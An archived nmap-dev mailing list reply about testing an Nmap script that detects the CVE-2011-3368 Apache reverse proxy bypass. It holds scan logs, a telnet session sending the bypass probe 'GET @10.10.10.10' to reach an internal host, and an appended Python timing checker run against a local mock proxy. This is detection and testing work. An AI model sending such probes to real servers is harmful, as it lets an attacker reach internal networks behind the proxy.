Nmap Development mailing list archives
Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass"
From: Michael Meyer <michael.meyer () greenbone net>
Date: Tue, 11 Oct 2011 15:17:41 +0200
*** Gutek <ange.gutek () gmail com> wrote:
> I've found a very few vulnerable ones, and that's not enough to be confident with this script. Of course I can't give them here, as I don't want to publicly expose them: that's why I'm calling for testers (2).
------------------------------------------------------------
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-11 14:41 CEST
--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 1000, min 100, max 10000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 0
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
mass_rdns: Using DNS server localhost
mass_rdns: 0.00s 0/1 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1]
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Packet capture filter (device lo): dst host 192.168.2.7 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 192.168.2.7)))
Overall sending rates: 69.23 packets / s, 3046.04 bytes / s.
NSE: Script scanning 192.168.2.7.
NSE: Starting runlevel 1 (of 1) scan.
NSE: Starting http-reverseproxy-bypass against 192.168.2.7:80.
NSE: Total number of pipelined requests: 3
NSE: Number of requests allowed by pipeline: 100
NSE: Received only 3 of 100 expected responses.
Decreasing max pipelined requests to 3.
NSE: Number of received responses: 3
NSE: http-reverseproxy-bypass : test 1 returned a 200
NSE: http-reverseproxy-bypass : CHRONO 404: 0
NSE: http-reverseproxy-bypass : CHRONO REQUEST: 30
NSE: http-reverseproxy-bypass : test 2 returned a 200
NSE: http-reverseproxy-bypass : CHRONO 404: 0
NSE: http-reverseproxy-bypass : CHRONO REQUEST: 30
NSE: http-reverseproxy-bypass : test 3 returned a 200
NSE: http-reverseproxy-bypass : CHRONO 404: 0
NSE: http-reverseproxy-bypass : CHRONO REQUEST: 30
NSE: Finished http-reverseproxy-bypass against 192.168.2.7:80.
Nmap scan report for 192.168.2.7
Host is up (0.000049s latency).
Scanned at 2011-10-11 14:41:39 CEST for 95s
PORT   STATE SERVICE
80/tcp open  http
|_http-reverseproxy-bypass: NOT found vulnerable to CVE-2011-3368, but allows requests to external websites
Final times for host: srtt: 49 rttvar: 5000 to: 100000
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Read from /opt/nmap/bin/../share/nmap: nmap-payloads nmap-services.
Nmap done: 1 IP address (1 host up) scanned in 95.20 seconds
------------------------------------------------------------

mime@kira[13]: ~ 0)$ netstat -n | grep 10\\.
tcp        0      1 192.168.2.7:45166       10.0.0.61:80            SYN_SENT
if reference.status and chrono_request > (chrono_404+1) then -- vulnerable if we get an error status after a consequent delay
I guess that reference.status is not true if the response takes longer than the 30 second timeout?

mime@kira[18]: ~ 0)$ date
Di 11. Okt 14:57:39 CEST 2011
         ^^^^^^^^
mime@kira[18]: ~ 0)$ telnet 192.168.2.7 80
Trying 192.168.2.7...
Connected to 192.168.2.7.
Escape character is '^]'.
GET @10.10.10.10 HTTP/1.0

[Tue Oct 11 15:01:01 2011] [error] (110)Connection timed out: proxy: HTTP: attempt to connect to 10.10.10.10:80 (*) failed
                ^^^^^^^^

I have to wait ~3 minutes for a response if the host is in another network.

HTH
Micha

--
Michael Meyer
OpenPGP Key: 52A6EFA6
http://www.greenbone.net/
Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 202460
Geschäftsführer: Lukas Grunwald, Dr. Jan-Oliver Wagner
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
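The false negative described in the mail above (the script's 30 second timeout fires long before the proxy's roughly 3 minute connect timeout to the internal host, so reference.status is never set and the `status and delay` condition is false) can be reproduced offline with the following Python. This is an added example written for this page; it is not Gutek's NSE script, not Nmap code and not Greenbone code. The probe request `GET @10.10.10.10 HTTP/1.0` is the one typed into telnet in the mail, and the rule "error status more than one second after the 404 baseline" mirrors the quoted Lua condition; the mock proxy, its 2 second backend delay, the `/nonexistent-probe-path` baseline request and the result labels are constructed for the example. What it adds to the discussion is a separate outcome for a probe that hits the client timeout, so that case is reported instead of being folded into "not vulnerable".

```python
# Added example: timing probe for the CVE-2011-3368 check plus a constructed
# local stand-in for the proxy, so the timeout false negative runs offline.
import socket
import threading
import time

PROBE_TARGET = "10.10.10.10"  # unroutable internal address, as in the mail


def build_probe(target: str) -> bytes:
    """Raw request with no leading slash (the probe from the mail).  Affected
    mod_proxy rewrite configs turn '@host' into a URL and connect to host."""
    return f"GET @{target} HTTP/1.0\r\n\r\n".encode()


def send_raw(host: str, port: int, request: bytes, timeout: float):
    """Send one raw request.  Returns (status or None, elapsed, timed_out)."""
    start = time.monotonic()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        try:
            data = s.recv(4096)
        except socket.timeout:
            return None, time.monotonic() - start, True
    elapsed = time.monotonic() - start
    parts = data.split(b"\r\n", 1)[0].split()
    if len(parts) >= 2 and parts[0].startswith(b"HTTP/") and parts[1].isdigit():
        return int(parts[1]), elapsed, False
    return None, elapsed, False


def classify(status, elapsed, timed_out, baseline_404):
    """Decision logic.  The quoted Lua check needs a status, so a probe that
    hits the client timeout while the proxy sits in SYN_SENT towards the
    internal host would be a false negative; report it as its own outcome."""
    if timed_out:
        return "timeout"         # proxy still waiting on the internal host
    if status is None:
        return "no-response"
    if status >= 400 and elapsed > baseline_404 + 1:
        return "vulnerable"      # error status only after a long connect attempt
    return "not-vulnerable"


def run_check(host: str, port: int, timeout: float) -> str:
    """Time a fast 404 as baseline, then time the @target probe against it."""
    baseline = b"GET /nonexistent-probe-path HTTP/1.0\r\n\r\n"  # assumed path
    _, base_t, _ = send_raw(host, port, baseline, timeout)
    status, elapsed, timed_out = send_raw(host, port, build_probe(PROBE_TARGET), timeout)
    return classify(status, elapsed, timed_out, base_t)


def mock_proxy(forwarding: bool, backend_delay: float, connections: int = 2) -> int:
    """Constructed stand-in for the target.  A 'forwarding' instance sleeps
    backend_delay on an @-request (the connect timeout seen in the mail) and
    then answers 502; a fixed instance answers 400 at once.  Returns the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(connections)

    def serve():
        for _ in range(connections):
            conn, _ = srv.accept()
            with conn:
                fields = conn.recv(1024).split(b" ")
                path = fields[1] if len(fields) > 1 else b"/"
                if path.startswith(b"@") and forwarding:
                    time.sleep(backend_delay)
                    reply = b"HTTP/1.0 502 Bad Gateway\r\n\r\n"
                elif path.startswith(b"@"):
                    reply = b"HTTP/1.0 400 Bad Request\r\n\r\n"
                else:
                    reply = b"HTTP/1.0 404 Not Found\r\n\r\n"
                try:
                    conn.sendall(reply)
                except OSError:
                    pass  # client already gave up (the timeout case)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    port = mock_proxy(forwarding=True, backend_delay=2.0)
    print("short client timeout:", run_check("127.0.0.1", port, timeout=0.5))
    port = mock_proxy(forwarding=True, backend_delay=2.0)
    print("long client timeout: ", run_check("127.0.0.1", port, timeout=5.0))
    port = mock_proxy(forwarding=False, backend_delay=0.0)
    print("fixed server:        ", run_check("127.0.0.1", port, timeout=5.0))
```

With the client timeout shorter than the backend delay the probe is reported as "timeout" rather than "not-vulnerable"; raising the timeout above the backend delay turns the same server into "vulnerable", because the 502 only arrives after the long connect attempt. Against a real target the timeout must cover the proxy's connect timeout (the mail measured about 3 minutes), or the timeout outcome has to be treated as a lead to verify by other means, for example the SYN_SENT socket or the proxy error log shown above.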
Current thread:
- [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Gutek (Oct 10)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Paulino Calderon (Oct 10)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Gutek (Oct 11)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" David Fifield (Oct 12)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Michael Meyer (Oct 11)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Gutek (Oct 11)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Michael Meyer (Oct 12)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Gutek (Oct 12)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Michael Meyer (Oct 12)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Patrik Karlsson (Nov 05)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Patrik Karlsson (Nov 11)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Patrik Karlsson (Nov 17)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Gutek (Oct 11)
- Re: [Request for Testers] CVE-2011-3368 "Reverse Proxy Bypass" Paulino Calderon (Oct 10)